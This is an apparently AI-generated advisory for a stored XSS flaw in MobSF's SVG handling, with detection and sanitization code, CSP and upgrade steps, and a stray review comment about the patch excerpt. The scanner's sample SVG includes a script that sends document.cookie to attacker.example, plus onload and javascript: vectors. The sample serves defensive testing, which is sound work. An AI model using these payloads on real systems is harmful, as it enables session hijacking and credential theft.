CVE-2025-46335 Overview
A stored cross-site scripting (XSS) vulnerability has been identified in Mobile Security Framework (MobSF), a widely used security research platform for analyzing mobile applications on Android, iOS and Windows Mobile. The flaw stems from insufficient sanitization of SVG files extracted from uploaded APKs during the Android static analysis workflow: script embedded in such an SVG is stored alongside the scan results and executes in the browser of any user who later views them.
Critical Impact
An attacker who can submit an APK for analysis can execute arbitrary JavaScript in the browsers of security researchers using the same MobSF instance, potentially leading to session hijacking, credential theft, or further compromise of the security testing environment.
Affected Products
- OpenSecurity Mobile Security Framework (MobSF) versions up to and including 4.3.2
- Any affected deployment that analyzes untrusted Android APKs, which may carry malicious SVG content
- Self-hosted and containerized MobSF installations alike
Discovery Timeline
- 2025-05-05 - CVE-2025-46335 published to NVD
- 2025-05-28 - Last updated in NVD database
Technical Details for CVE-2025-46335
Vulnerability Analysis
This stored XSS (CWE-79) occurs in MobSF's Android APK analysis workflow when SVG files packaged inside the application are processed. SVG is an XML format that can carry JavaScript through <script> elements, event-handler attributes such as onload and onclick, and javascript: URLs in href attributes. Because MobSF extracted and presented these files without sanitizing them, the script is stored on the server with the scan results and runs in the MobSF origin whenever a user's browser renders the SVG as a document rather than as an image: inlined into a page, opened directly at its own URL, or embedded via <object> or <iframe>. An SVG loaded through an <img> element does not execute script, so the rendering path is what turns a stored file into a stored XSS.
Exploitation requires only low privileges: an authenticated user needs just the ability to upload a crafted APK containing a malicious SVG. User interaction is required, since a victim must open the analysis report containing the unsanitized SVG. Successful exploitation fully compromises confidentiality and integrity within the application context, with limited impact on availability.
Root Cause
The root cause is insufficient input validation and output encoding of SVG content during APK analysis. MobSF neither stripped script-capable content (script elements, event-handler attributes, javascript: URLs, foreignObject blocks) from extracted SVGs nor served them in a way that prevents execution, so any embedded script ran when the file was rendered in the web interface. SVGs are a well-known XSS vector for exactly this reason: they are treated as images by upload filters but are executable XML documents to the browser.
Attack Vector
An attacker can exploit this vulnerability through the following network-based attack flow:
- Craft Malicious APK: The attacker creates or modifies an Android APK file to include an SVG resource containing embedded JavaScript payload
- Upload for Analysis: The attacker uploads the malicious APK to the target MobSF instance for security analysis
- Storage and Persistence: MobSF processes the APK, extracts the malicious SVG, and stores it without sanitization
- Victim Interaction: When another user (typically a security researcher or administrator) views the analysis report, the malicious SVG is rendered
- Payload Execution: The embedded JavaScript executes in the victim's browser session, potentially stealing session tokens, performing actions on behalf of the user, or exfiltrating sensitive analysis data
# Security patch in mobsf/MobSF/init.py - Version update to 4.3.3
# Source: https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/6987a946485a795f4fd38cebdb4860b368a1995d
logger = logging.getLogger(__name__)
-VERSION = '4.3.2'
+VERSION = '4.3.3'
BANNER = r"""
__ __ _ ____ _____ _ _ _____
| \/ | ___ | |__/ ___|| ___|_ _| || | |___ /
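Review bot: the excerpt shows only the VERSION bump from '4.3.2' to '4.3.3' in mobsf/MobSF/init.py and the first lines of the BANNER string; none of the SVG sanitization that the surrounding text credits to this release is visible here, so a reader cannot verify the fix from this hunk alone. Include the hunk that changes the SVG handling in the APK analysis flow next to the version bump, or point to the file that carries it in the linked commit, so the patch excerpt documents the security change rather than just the release number.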
Detection Methods for CVE-2025-46335
Indicators of Compromise
- Uploaded APK files containing SVG resources with embedded <script> tags or JavaScript event handlers
- Analysis reports displaying SVG images that trigger unexpected JavaScript execution
- Unusual session activity or token exfiltration attempts originating from the MobSF web interface
- Log entries showing access to analysis results from unexpected IP addresses following initial APK upload
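The following Python is an added example, not MobSF's own code, and serves both the Root Cause section's point about script-capable SVG content and the indicators of compromise listed above: it walks a constructed in-memory APK, flags SVG entries carrying <script> or <foreignObject> elements, on* event handlers or javascript: URLs, and returns a sanitized copy with those removed. The APK contents, entry names and the attacker.example host are constructed for the demonstration.

```python
# Added example, not MobSF project code: scan an APK (a ZIP archive) for SVG
# resources that can run script, and produce a sanitized copy of each one.
# EVIL_SVG and the APK built in build_sample_apk() are constructed inputs.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Elements that execute script or embed arbitrary HTML when an SVG is rendered
# as a document (inline, navigated to directly, or via <object>/<iframe>).
SCRIPT_TAGS = {"script", "foreignObject"}
# Attributes that carry URLs and therefore may use the javascript: scheme.
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
JS_SCHEME = re.compile(r"^\s*javascript:", re.IGNORECASE)

# Constructed malicious SVG: handler on the root, a script element,
# a javascript: link and a foreignObject carrying HTML.
EVIL_SVG = (
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b'xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">'
    b'<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    b'<a xlink:href="javascript:alert(2)"><text>report</text></a>'
    b'<foreignObject><body xmlns="http://www.w3.org/1999/xhtml"/></foreignObject>'
    b'</svg>'
)
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def _dangerous_attrs(el):
    """Yield attribute keys on el that are event handlers or javascript: URLs."""
    for attr, value in el.attrib.items():
        if _local(attr).lower().startswith("on"):
            yield attr
        elif attr in URL_ATTRS and JS_SCHEME.match(value):
            yield attr


def svg_findings(svg_data):
    """Return human-readable reasons why this SVG could execute script."""
    findings = []
    for el in ET.fromstring(svg_data).iter():
        name = _local(el.tag)
        if name in SCRIPT_TAGS:
            findings.append("<%s> element" % name)
        for attr in _dangerous_attrs(el):
            findings.append("%s attribute on <%s>" % (_local(attr), name))
    return findings


def sanitize_svg(svg_data):
    """Return the SVG as a string with script-capable content removed."""
    root = ET.fromstring(svg_data)
    if _local(root.tag) in SCRIPT_TAGS:
        raise ValueError("root element is not a safe SVG element")
    # Snapshot the tree before mutating it; removing nodes while the
    # iterator walks the tree can skip siblings.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in SCRIPT_TAGS:
                parent.remove(child)
    for el in root.iter():
        for attr in list(_dangerous_attrs(el)):
            del el.attrib[attr]
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="unicode")


def scan_apk_for_svg(apk_bytes):
    """Map each SVG entry in the APK that could run script to its findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            # Go by extension or by content: an SVG need not be named .svg
            if not (info.filename.lower().endswith(".svg") or b"<svg" in data[:512]):
                continue
            try:
                findings = svg_findings(data)
            except ET.ParseError as exc:
                findings = ["unparseable SVG (%s)" % exc]
            if findings:
                results[info.filename] = findings
    return results


def build_sample_apk():
    """Constructed in-memory APK: one clean icon and one SVG carrying payloads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", "<manifest/>")
        zf.writestr("assets/icon.svg", CLEAN_SVG)
        zf.writestr("assets/banner.svg", EVIL_SVG)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_apk_for_svg(build_sample_apk()).items():
        print(name, "->", ", ".join(reasons))
    print(sanitize_svg(EVIL_SVG))
```

The strip-list approach shows what is being removed; a production sanitizer should instead allow-list the elements and attributes it accepts, since the set of script-capable SVG features is larger than the four checked here. Either way, the findings only matter where the stored file is inlined, opened at its own URL or embedded via <object>/<iframe>; an <img>-rendered SVG never runs script.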
Detection Strategies
- Scan uploaded APKs server-side after extraction for SVG resources containing <script> elements, on* event handlers or javascript: URLs, and log the result per upload together with the uploading account and source address
- Send a Content Security Policy with a report-uri or report-to directive so that blocked inline-script executions are reported and can be alerted on
- Deploy web application firewall (WAF) rules with realistic expectations: the SVG sits compressed inside the APK's ZIP container, so rules inspecting the raw upload body will usually not see the payload; detection has to happen after extraction
- Review MobSF access logs for correlations between APK uploads and subsequent unusual user activity
Monitoring Recommendations
- Enable verbose logging for file upload and analysis operations within MobSF
- Use CSP violation reporting rather than ad hoc browser-side monitoring to detect unexpected script execution in the MobSF origin; the report's document-uri, blocked-uri and script-sample fields identify the page and the blocked code
- Implement session monitoring to detect anomalous behavior following analysis report access
- Set up alerting for CSP violation reports that may indicate XSS exploitation attempts, after baselining the reports MobSF's own pages generate so that only new inline-script sources raise alerts
How to Mitigate CVE-2025-46335
Immediate Actions Required
- Upgrade MobSF to version 4.3.3 or later immediately
- Before patching, review recent upload and analysis logs for APKs from untrusted sources, and afterwards delete or re-scan those analyses, since SVG content extracted before the upgrade may still be stored unsanitized
- Invalidate all active user sessions after upgrading, in case session tokens were already exfiltrated by a stored payload
- Audit user accounts for any unauthorized changes that may have resulted from prior exploitation
Patch Information
The MobSF development team addressed this vulnerability in version 4.3.3. The fix sanitizes SVG content extracted during APK analysis so that embedded JavaScript cannot execute when analysis results are rendered. Organizations should upgrade to version 4.3.3 or later from the official MobSF GitHub repository; the fixing commit is linked above, and further details are in the project's GitHub Security Advisory.
Workarounds
- Restrict MobSF access to trusted users only until the patch can be applied
- Implement network-level access controls to limit who can upload APK files for analysis
- Configure the reverse proxy in front of MobSF to send a Content Security Policy that blocks inline script. Baseline it in report-only mode first: if MobSF's own pages rely on inline scripts, enforcing script-src 'self' will break the UI. In nginx, add_header set in the server block applies to every response, including extracted SVG files served directly, unless a location block sets its own add_header directives, which replace the inherited ones
- Consider running MobSF in an isolated environment with limited network connectivity to reduce exploitation impact
# Example: Apply a restrictive Content Security Policy via an nginx reverse proxy
# Add to the nginx server block that fronts MobSF. Start in report-only mode, with
# /csp-report as a placeholder for a report collector you control:
add_header Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; object-src 'none'; frame-ancestors 'self'; report-uri /csp-report" always;
# Once the reports are clean, switch to the enforcing header:
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; object-src 'none'; frame-ancestors 'self';" always;
# Upgrade a source install of MobSF to the patched release
cd /path/to/Mobile-Security-Framework-MobSF
git fetch --tags origin
git checkout v4.3.3
./setup.sh   # re-run the project's setup script so the release's dependencies are installed
# Container deployments: pull the patched image and recreate the container
docker pull opensecurity/mobile-security-framework-mobsf:latest
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

